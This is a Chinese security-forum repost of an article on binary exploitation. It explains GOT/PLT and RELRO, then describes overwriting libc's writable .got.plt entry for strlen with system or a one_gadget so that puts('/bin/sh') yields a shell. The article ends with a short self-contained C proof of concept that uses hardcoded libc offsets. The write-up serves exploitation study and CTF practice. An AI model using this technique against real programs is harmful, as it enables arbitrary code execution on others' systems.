安全矩阵

 找回密码
 立即注册
搜索
查看: 666|回复: 0

无路远征——GLIBC2.37后时代的IO攻击之道 house_of_秦月汉关

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2023-3-17 22:32:56 | 显示全部楼层 |阅读模式
原文链接:无路远征——GLIBC2.37后时代的IO攻击之道 house_of_秦月汉关



老生常谈的GOT表与PLT表

一、老生常谈的GOT表与PLT表

对于linux操作系统,GOT表与PLT表是绕不开的问题。

GOT表全称Global Offset Table,翻译过来就是全局偏移表,用于记录在 ELF 文件中所用到的共享库中符号的地址。说人话,就是程序中开辟了一块固定位置的内存用来存储数据。大部分时候存储的是函数指针。

PLT表全称Procedure Linkage Table,翻译过来就是过程链接表,作用是将位置无关的符号转移到绝对地址。当一个外部符号被调用时,PLT 去引用 GOT 中的其符号对应的绝对地址。具体说就是jmp [got]这种形式来跳到指定位置。

GOT表与PLT表可以算是编译届的老古董,它们的产生可以看作软件发展的必然,目前任何操作系统都在使用他们。

在linux的3环程序中,RELRO (ReLocation Read-Only)保护主要针对的就是GOT表,有3种模式,其中partial与null对GOT表保护相同。

  1. full relro(全部开启,got 不可写)
  2. partial relro (部分开启,got 可写)
  3. null relro (不开启,got 可写)
复制代码

partial与null模式下,在程序刚开始运行时,GOT 表项是空的,当符号第一次被调用时会动态解析符号的绝对地址然后转去执行,并将被解析符号的绝对地址记录在 GOT 中,第二次调用同一符号时,由于 GOT 中已经记录了其绝对地址,直接转去执行即可(不用重新解析)。ret2dlresolve就是针对动态解析过程的一种攻击手段。

full模式下,程序在开始时,在_dl_relocate_object过程中直接将符号表解析, GOT 中已经记录了其绝对地址,直接转去执行即可,并且GOT表被分在了不可写的段中。




程序重定位的达摩克利斯之剑

程序重定位的需求是GOT表与PLT表的前提,在汇编时代,PIC(position-independent code,地址无关代码)使得程序某些内容必须重定位。x86时代,各路链接器在程序重定位方面也是八仙过海各显其能,以GNU为例,程序重定位是通过__x86.get_pc_thunk.ax这一类函数实现的,这个函数的作用就是利用call在栈中存储的eip,并将其赋值给通用寄存器,在之后的程序中以此通用寄存器进行定位。
喜大普奔的RIP寻址

x64指令集在升级的同时,发明了RIP寻址,这使得程序重定位工作变得简单了许多,我们对比x86与x64的编译之后的文件就可以明显看出区别。x86程序中要定位data段的字符串需要用到__x86.get_pc_thunk.ax得到当前的ip,然后通过偏移找到字符串地址,而x64系统中只需要使用lea rdi,[rip+0xeac]这一条指令就能找到字符串的地址。
在x86_64架构下的现代操作系统中,因为使用虚拟内存管理,完全可以不使用PIC,但是编译器发展这么久掌握的屠龙之技,不用可惜了,于是就打了个安全的旗号继续使用(说笑)。同样,PIE(position-independent executable,地址无关可执行文件 )只是在PIC基础上更近了一步而已,不用过多赘述。




秦月汉关再现

C库也需要重定位

C库与其他三环程序本质上没有任何区别,而且因为它本身由很多文件编译而成,重定位需求更加强烈,同样也有GOT表与PLT表,只是一般来说C库的都是full relro,GOT不可写。

神出鬼没的PLT

PLT就是过程链接,对于一个程序而言,任何需要在运行时才确定的内容都是需要过程链接的,例如C++在虚函数展现多态时,虚函数指针就需要在运行时进行链接。同样,在程序处理过程中也需要对一些函数的got表在过程中再进行链接,就会有.got.plt节,这个节由_dl_relocate_object在程序开始时根据运行环境进行解析(主要是字符集,链接器等内容),而这个节为了能适应环境,就设计成可写的。

以strlen为例,在libc静态编译中看到的函数如下,这是根据环境信息对参数进行一定的设置。
但实际函数并非如此。因为puts函数在开始时候会调用strlen, 我们跟随puts函数找到真正的strlen。可以看出puts会调用strlen的PLT表,PLT表跳转到一个*ABS*@got.plt>的地方,里面存储的才是真正的strlen函数地址。

其中*ABS*@got.plt>对应的就是.got.plt节。
真正的strlen函数反编译如下,过程还是非常复杂的。

最后说一下,不但有.got.plt这种形式,PLT表也分很多,例如.plt.got、.plt.sec等。其中.plt.sec调用的就是.got.plt中的内容。



攻击方式

说明到这个地方,攻击方式就很简单了,就以刚才的puts函数为例,既然它一开始会执行strlen(buf)计算字符串长度,那么如果将其修改成strlen的.got.plt中的内容改成system就能够getshell。而且,附近数据非常丰富,fastbin attack和tcache attack都可以使用,还可以将其直接修改为one_gadget。在2.34各类hook都不能使用的情况下,如果屏蔽掉exit函数,这是一种很好用的攻击方式。

需要说明的是,除了puts之外,很多函数都会调用.got.plt中的内容,连__libc_message 这种函数都会调用,希望大家可以奋力挖掘。

其他

此篇文章没有专门的板子,因为只是一种攻击思路,主要原因是为后面一条链做好铺垫。

补充一个简单POC

  1. #include <stdio.h>
  2. #include <string.h>

  3. int main()
  4. {
  5.     long long int puts_offset = 0x80ed0;
  6.     long long int libc_base_addr = (long long int)&puts - puts_offset;
  7.     long long int strlen_addr  = libc_base_addr + 0x19d960;
  8.     long long int system_addr = libc_base_addr  + 0x50d60;
  9.     long long int *strlen_got_plt_addr= (long long int *)(libc_base_addr + 0x219098 );
  10.     puts("输出/bin/sh");
  11.     puts("/bin/sh");
  12.     *strlen_got_plt_addr = system_addr;
  13.     puts("取得shell");
  14.     puts("/bin/sh");

  15.     return 0;
  16. }
复制代码











本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 23:34 , Processed in 0.014144 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表